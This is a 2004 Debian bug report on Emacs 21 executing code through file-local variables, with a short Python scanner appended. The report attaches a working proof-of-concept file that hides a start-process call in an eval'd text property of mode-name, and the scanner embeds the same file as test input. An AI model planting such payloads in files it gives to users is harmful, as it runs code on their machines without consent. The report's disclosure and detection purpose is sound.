Message-ID: <email address hidden>
Date: Sat, 18 Dec 2004 06:54:29 +0000
From: Jan Minar <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: emacs21: Arbitrary code execution when opening malicious file (local variables)
Content-Type: multipart/mixed; boundary="eJnRUKwClWJh1Khz"
Content-Disposition: inline

--eJnRUKwClWJh1Khz
Content-Type: multipart/mixed; boundary="opJtzjQTFsWo+cga"
Content-Disposition: inline

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline

Package: emacs21
Version: 21.2-1
Severity: grave
Justification: user security hole
Hi.
In December 2002[sic!], Georgi Guninski <email address hidden> writes in
<email address hidden>:
> Attached file demonstrates GNU Emacs 21.2.1 starting process if a text file is
> opened. Just open it with emacs and check for processes "yes".
>
> I suggest disabling local variables by default, because probably there are
> similar bugs of the same nature.
You can view the thread for example at Google Groups:
http://groups-beta.google.com/group/gnu.emacs.bug/browse_frm/thread/9424ec1b2fdae321?hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1&prev=/groups%3Fq%3Dguninski%2Bemacs%26hl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26selm%3Dmailman.763.1041357806.19936.bug-gnu-emacs%2540gnu.org%26rnum%3D1
The same url in Quoted Printable, in case it got mangled somehow en
route (run it thru recode /qp..):
http://groups-beta.google.com/group/gnu.emacs.bug/browse_frm/thread/9424ec1b2fdae321?hl=3Den&lr=3D&ie=3DUTF-8&oe=3DUTF-8&rnum=3D1&prev=3D/groups%3Fq%3Dguninski%2Bemacs%26hl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26selm%3Dmailman.763.1041357806.19936.bug-gnu-emacs%2540gnu.org%26rnum%3D1
Georgi's file is enclosed verbatim.
I just tried it with emacs in Woody and indeed, the yes processes
started to spawn at a fast pace. I went even a bit further and found
out that the execution is not sandboxed in any way, as I was able to
execute a script that writes out a script in my home directory, chmod +x
it, and runs it in turn.
In the above thread, it's mentioned another security bug was found
earlier that week, so please take a look at it.
Cheers,
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.28-jan #2 Sat Nov 27 02:52:26 GMT 2004 i686
Locale: LANG=C, LC_CTYPE=cs_CZ.ISO-8859-2
Versions of packages emacs21 depends on:
ii  dpkg            1.9.21             Package maintenance system for Deb
ii  emacsen-common  1.4.15             Common facilities for all emacsen.
ii  libc6           2.2.5-11.5         GNU C Library: Shared libraries an
ii  libjpeg62       6b-5               The Independent JPEG Group's JPEG
ii  liblockfile1    1.03               NFS-safe locking library, includes
ii  libncurses5     5.2.20020112a-7    Shared libraries for terminal hand
ii  libpng2         1.0.12-3.woody.9   PNG library - runtime
ii  libtiff3g       3.5.5-6woody1      Tag Image File Format library
ii  xaw3dg          1.5-13             Xaw3d widget set
ii  xlibs           4.1.0-16woody5     X Window System client libraries
ii  zlib1g          1:1.1.4-1.0woody0  compression library - runtime
-- 
 )^o-o^|      jabber: <email address hidden>
 | .v K       e-mail: jjminar FastMail FM
 ` - .'       phone:  +44(0)7981 738 696
  \ __/Jan    icq:    345 355 493
 __|o|__Minář irc:    <email address hidden>
--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="emacs1.emacs"

/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */
Emacs better than windoze.
 
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***
--opJtzjQTFsWo+cga--
--eJnRUKwClWJh1Khz
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFBw9Ql+f/TjmbX5NaR5HlUuczK20Fa5cRAsbWAKCmepYq6FU3t9NHAxGtP
u6kXstOqACguN5GKb8/gkjc=
=ddER
-----END PGP SIGNATURE-----

--eJnRUKwClWJh1Khz--
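Added example, not part of the bug report and not Emacs's own code: a small Python scanner for the two places Emacs reads file-local variables from, the first-line -*- ... -*- property line and the trailing Local Variables: ... End: block. It parses the block the way Emacs does, taking the prefix and suffix from the Local Variables: line and requiring them on every following line, and looks only in the last 3000 characters, which is where Emacs searches. It then flags entries that can run code when the file is merely visited: a variable literally named eval, names ending in -hook, -function, -program and similar suffixes (an assumed list, loosely modelled on Emacs's risky-local-variable-p heuristics, not a copy of it), and values that contain a text-property string literal #( ... ) or an (eval ...) form. The last two are exactly what Guninski's file relies on: it gives mode-name a string carrying a (display (when (eval ...) . xxx)) property, and Emacs evaluates the when condition while drawing the mode line, which is why the "yes" processes appear as soon as the buffer is displayed. The sample inputs are the attached PoC above and a constructed benign file.

```python
"""Scan text files for Emacs file-local variables that can execute code on visit.

Added example for the emacs21 local-variables report; not code from that report
or from Emacs itself.
"""
import re
from typing import List, Tuple

# Sample input: the PoC attached to the bug report above, embedded verbatim.
POC = r'''/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */
Emacs better than windoze.
 
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***
'''

# Constructed benign file for comparison: ordinary editing settings only.
BENIGN = ("# -*- coding: utf-8; mode: python -*-\n"
          "print('hi')\n"
          "# Local Variables:\n"
          "# fill-column: 72\n"
          "# End:\n")

# Assumed heuristics (not Emacs's exact list): names and name suffixes whose
# values are Lisp that Emacs will evaluate or call.
RISKY_NAMES = {"eval", "mode-name", "load-path", "exec-path", "shell-file-name"}
RISKY_SUFFIXES = ("-hook", "-hooks", "-function", "-functions", "-form",
                  "-forms", "-program", "-command", "-predicate", "-map")


def parse_prop_line(first_line: str) -> List[Tuple[str, str]]:
    """Parse the first-line '-*- name: value; ... -*-' spec (first pair only)."""
    m = re.search(r"-\*-(.*?)-\*-", first_line)
    if not m:
        return []
    body = m.group(1).strip()
    if ":" not in body:            # bare form such as -*- lisp -*- names a mode
        return [("mode", body)]
    entries = []
    for item in body.split(";"):
        if ":" in item:
            name, value = item.split(":", 1)
            entries.append((name.strip(), value.strip()))
    return entries


def parse_local_variables(text: str) -> List[Tuple[str, str]]:
    """Parse the trailing 'Local Variables:' ... 'End:' block.

    The prefix (text before 'Local Variables:') and suffix (text after it) are
    taken from the header line and must bracket every line of the block, as
    Emacs requires; only the last 3000 characters are searched, as Emacs does.
    """
    lines = text[-3000:].splitlines()
    start = None
    for i, line in enumerate(lines):
        if "Local Variables:" in line:
            start = i                       # Emacs uses the last occurrence
    if start is None:
        return []
    head = lines[start]
    idx = head.index("Local Variables:")
    prefix = head[:idx]
    suffix = head[idx + len("Local Variables:"):].strip()
    entries = []
    for line in lines[start + 1:]:
        if not line.startswith(prefix):
            break
        body = line[len(prefix):].rstrip()
        if suffix:
            if not body.endswith(suffix):
                break
            body = body[:-len(suffix)].rstrip()
        if body.strip() == "End:":
            break
        name, sep, value = body.partition(":")
        if not sep:
            break
        entries.append((name.strip(), value.strip()))
    return entries


def is_risky(name: str, value: str) -> bool:
    """True if setting this variable from a file can lead to code execution."""
    n = name.lower()
    if n in RISKY_NAMES or n.endswith(RISKY_SUFFIXES):
        return True
    # '#("..." 0 4 (display ...))' is a string literal with text properties;
    # '(eval ...)' inside a display spec is evaluated at redisplay time.
    return "#(" in value or "(eval" in value.lower()


def scan(text: str) -> List[str]:
    """Return the names of risky file-local variables found in text."""
    lines = text.splitlines()
    entries = parse_prop_line(lines[0]) if lines else []
    entries += parse_local_variables(text)
    return [name for name, value in entries if is_risky(name, value)]


if __name__ == "__main__":
    print("PoC:", scan(POC))        # flags 'Eval' and 'mode-name'
    print("benign:", scan(BENIGN))  # flags nothing
```

This is a triage aid for a pile of untrusted files, not a fix for the editor: the workaround Guninski asks for is (setq enable-local-variables nil) in your init file, which disables file-local variable processing, and the report shows why a blacklist of variable names alone is not enough when the payload hides inside a text property of an otherwise harmless-looking string.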